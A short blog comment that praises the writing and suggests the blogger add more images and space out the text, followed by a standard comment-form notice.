  1. I was wondering if you ever considered changing the page layout of your blog? Its very well written; I love what youve got to say. But maybe you could a little more in the way of content so people could connect with it better. Youve got an awful lot of text for only having one or two images. Maybe you could space it out better?

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *